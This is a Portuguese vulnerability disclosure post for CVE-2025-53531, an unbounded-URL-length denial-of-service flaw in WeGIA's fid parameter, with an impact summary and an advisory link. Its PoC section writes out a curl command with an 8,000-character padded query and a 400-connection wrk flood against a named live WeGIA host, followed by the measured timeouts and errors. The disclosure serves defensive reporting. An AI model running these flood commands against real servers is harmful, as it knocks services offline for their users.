Featured image of post CVE-2025-53531

CVE-2025-53531

Denial of Service (DoS)

CVE-2025-53531: Consumo descontrolado de recursos no parâmetro fid do WeGIA

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-53531

Resumo

O servidor Wegia possui uma vulnerabilidade que permite solicitações HTTP GET excessivamente longas para uma URL específica. Esse problema surge da falta de validação do comprimento do parâmetro fid. Testes confirmaram que o servidor processa URLs de até 8.142 caracteres, resultando em alto consumo de recursos, latência elevada, timeouts e erros de leitura. Isso torna o servidor suscetível a ataques de Negação de Serviço (DoS).

Detalhes

Endpoint Vulnerável: GET https://comfirewall.wegia.org:8000/WeGIA?fid=111251&file_url=111256&param1=AAAA&param2=BBBB&param3=CCCC...

  • A URL aceita parâmetros concatenados com &, permitindo que invasores adicionem uma quantidade arbitrária de dados de até 8.142 caracteres.
  • Não há validação para o comprimento total da URL ou o número de parâmetros processados ​​pelo servidor.
  • Durante o teste, a URL foi estendida com parâmetros repetidos (¶m=-value-), causando exaustão de recursos e instabilidade do servidor.

PoC

Etapas para reproduzir o problema:

  • Execute a seguinte solicitação HTTP GET para reproduzir o problema:

1
  curl "https://comfirewall.wegia.org:8000/WeGIA?fid=111251&file_url=111256$(python3 -c 'print("&param=" + "X"*8000)')"

  • Para simular um ataque de alta carga, use a ferramenta wrk:

1
  wrk -t12 -c400 -d60s "https://comfirewall.wegia.org:8000/WeGIA?fid=111251&file_url=111256$(python3 -c 'print("&param=" + "X"*8000)')"

Resultados de testes atualizados com wrk:

  • Solicitações processadas: 20.799 solicitações em 1 minuto, com 330,90 MB lidos.
  • Latência média: 280,91 ms, com pico de 2 segundos.
  • Erros: 98 erros de leitura e 591 tempos limite ocorreram.
  • Taxa de solicitação: 346,07 solicitações/seg.
  • Transferência de dados: 5,51 MB/seg.

Impacto

Esta é uma vulnerabilidade de Negação de Serviço. Qualquer usuário não autenticado com acesso a ferramentas como o OWASP ZAP pode explorar esse problema e fazer com que o servidor pare de responder. Isso afeta a disponibilidade do aplicativo e pode interromper as operações comerciais. A falta de limitação de taxa e restrições de rastreamento recursivo aumenta o risco e torna a vulnerabilidade explorável por invasores pouco qualificados.

Referência

https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-4ffc-f23j-54m3

Encontrado por

Rafael Corvino

Colaboradores

Diego Castro

Elisangela Mendonça

Natan Maia Morette

By: CVE-Hunters

Built with Hugo
Theme Stack designed by Jimmy